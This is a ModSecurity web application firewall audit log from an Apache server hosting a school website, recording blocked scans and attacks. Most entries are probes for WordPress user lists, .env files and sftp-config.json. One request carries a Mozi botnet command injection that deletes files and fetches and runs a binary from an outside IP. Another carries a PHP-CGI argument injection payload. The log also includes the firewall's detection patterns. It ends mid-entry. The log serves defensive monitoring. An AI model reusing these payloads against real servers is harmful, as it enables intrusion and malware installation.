[10/Jun/2025:00:55:43 +0700] aEcgH2IgvuFVSPOFHr8rrgAAAFY 103.236.140.4 41314 103.236.140.4 8181 --88107340-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.142.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.142.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88107340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88107340-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749491743439214 3550 (- - -) Stopwatch2: 1749491743439214 3550; combined=1456, p1=511, p2=907, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88107340-Z-- --27d14110-A-- [10/Jun/2025:01:05:13 +0700] aEciWRMDIkuu7kMwm-Al1gAAAI0 103.236.140.4 41858 103.236.140.4 8181 --27d14110-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Accept-Charset: utf-8 --27d14110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27d14110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749492313152341 880 (- - -) Stopwatch2: 1749492313152341 880; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27d14110-Z-- --2a357656-A-- [10/Jun/2025:01:07:38 +0700] aEci6q6OGK25CtJ36rM4wAAAAAw 103.236.140.4 41874 103.236.140.4 8181 --2a357656-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.206.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.206.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2a357656-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a357656-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749492458579953 2941 (- - -) Stopwatch2: 1749492458579953 2941; combined=1275, p1=430, p2=816, p3=0, p4=0, p5=29, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a357656-Z-- --b5129129-A-- [10/Jun/2025:01:13:21 +0700] aEckQRMDIkuu7kMwm-Al3wAAAJc 103.236.140.4 41908 103.236.140.4 8181 --b5129129-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.215.68.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.215.68.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5129129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5129129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749492801544889 3260 (- - -) Stopwatch2: 1749492801544889 3260; combined=1383, p1=487, p2=864, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5129129-Z-- --dd90be40-A-- [10/Jun/2025:01:17:04 +0700] aEclIGIgvuFVSPOFHr8ruAAAAEQ 103.236.140.4 41930 103.236.140.4 8181 --dd90be40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.93.28.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.93.28.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd90be40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd90be40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749493024884101 3706 (- - -) Stopwatch2: 1749493024884101 3706; combined=1507, p1=504, p2=968, p3=0, p4=0, p5=35, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd90be40-Z-- --52e7211a-A-- [10/Jun/2025:01:43:49 +0700] aEcrZU2r5gN9oSasJQzUYAAAAMw 103.236.140.4 51528 103.236.140.4 8181 --52e7211a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.79.156.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.79.156.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52e7211a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52e7211a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749494629900863 3189 (- - -) Stopwatch2: 1749494629900863 3189; combined=1386, p1=475, p2=874, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52e7211a-Z-- --f0180114-A-- [10/Jun/2025:02:43:57 +0700] aEc5fU2r5gN9oSasJQzUzQAAAMU 103.236.140.4 53552 103.236.140.4 8181 --f0180114-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0 SeaMonkey/2.21 Accept-Charset: utf-8 --f0180114-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0180114-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749498237004991 732 (- - -) Stopwatch2: 1749498237004991 732; combined=331, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0180114-Z-- --89434623-A-- [10/Jun/2025:03:06:30 +0700] aEc-xhMDIkuu7kMwm-ArlwAAAJc 103.236.140.4 53800 103.236.140.4 8181 --89434623-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozila/5.0 Accept: */* --89434623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89434623-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590078083 998 (- - -) Stopwatch2: 1749499590078083 998; combined=466, p1=422, p2=0, p3=0, p4=0, p5=44, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89434623-Z-- --19569e1b-A-- [10/Jun/2025:03:06:30 +0700] aEc-xhMDIkuu7kMwm-ArmQAAAJc 103.236.140.4 53804 103.236.140.4 8181 --19569e1b-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Mozila/5.0 Accept: */* --19569e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19569e1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590079258 637 (- - -) Stopwatch2: 1749499590079258 637; combined=234, p1=208, p2=0, p3=0, p4=0, p5=26, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19569e1b-Z-- --44001d10-A-- [10/Jun/2025:03:06:30 +0700] aEc-xmIgvuFVSPOFHr8vrgAAAFM 103.236.140.4 53808 103.236.140.4 8181 --44001d10-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --44001d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44001d10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590110923 718 (- - -) Stopwatch2: 1749499590110923 718; combined=259, p1=221, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44001d10-Z-- --8332b82f-A-- [10/Jun/2025:03:06:30 +0700] aEc-xk2r5gN9oSasJQzU1gAAANY 103.236.140.4 53810 103.236.140.4 8181 --8332b82f-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --8332b82f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8332b82f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749499590112701 770 (- - -) Stopwatch2: 1749499590112701 770; combined=286, p1=254, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8332b82f-Z-- --6ba20b5b-A-- [10/Jun/2025:03:24:10 +0700] aEdC6q6OGK25CtJ36rM-HQAAABY 103.236.140.4 54194 103.236.140.4 8181 --6ba20b5b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 35.240.94.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.240.94.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6ba20b5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ba20b5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749500650262031 2168 (- - -) Stopwatch2: 1749500650262031 2168; combined=1136, p1=364, p2=749, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ba20b5b-Z-- --434fc673-A-- [10/Jun/2025:03:31:57 +0700] aEdEvRMDIkuu7kMwm-Ar3QAAAIo 103.236.140.4 54228 103.236.140.4 8181 --434fc673-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.78.73.77 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.78.73.77 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --434fc673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --434fc673-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749501117459507 3119 (- - -) Stopwatch2: 1749501117459507 3119; combined=1326, p1=453, p2=841, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --434fc673-Z-- --c7951061-A-- [10/Jun/2025:03:44:22 +0700] aEdHppSz29O8wd7wtMvGGwAAAIQ 103.236.140.4 56076 103.236.140.4 8181 --c7951061-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://39.71.37.34:38505/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 39.71.37.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 39.71.37.34 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --c7951061-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7951061-E-- --c7951061-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://39.71.37.34:38505/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://39.71.37.34:38505/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749501862311976 2950 (- - -) Stopwatch2: 1749501862311976 2950; combined=975, p1=695, p2=235, p3=0, p4=0, p5=45, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7951061-Z-- --8c9f5134-A-- [10/Jun/2025:03:52:39 +0700] aEdJl2kffiosQXBbxVZQsQAAAME 103.236.140.4 56204 103.236.140.4 8181 --8c9f5134-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.14.250.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.14.250.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8c9f5134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c9f5134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749502359559343 3266 (- - -) Stopwatch2: 1749502359559343 3266; combined=1237, p1=427, p2=781, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c9f5134-Z-- --3e1fc02a-A-- [10/Jun/2025:04:16:21 +0700] aEdPJWkffiosQXBbxVZQxQAAANE 103.236.140.4 56398 103.236.140.4 8181 --3e1fc02a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.65.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.65.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3e1fc02a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e1fc02a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749503781148596 952 (- - -) Stopwatch2: 1749503781148596 952; combined=351, p1=312, p2=0, p3=0, p4=0, p5=38, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e1fc02a-Z-- --81b0331f-A-- [10/Jun/2025:05:14:10 +0700] aEdcsmQJEkWdvAT5oU6e4AAAABg 103.236.140.4 56992 103.236.140.4 8181 --81b0331f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.136.185.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.136.185.169 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --81b0331f-C-- --81b0331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81b0331f-E-- --81b0331f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749507250834208 5585 (- - -) Stopwatch2: 1749507250834208 5585; combined=3475, p1=574, p2=2858, p3=0, p4=0, p5=43, sr=131, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81b0331f-Z-- --5e17b57b-A-- [10/Jun/2025:05:14:50 +0700] aEdc2mQJEkWdvAT5oU6e8AAAABI 103.236.140.4 57024 103.236.140.4 8181 --5e17b57b-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; STK-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5e17b57b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e17b57b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 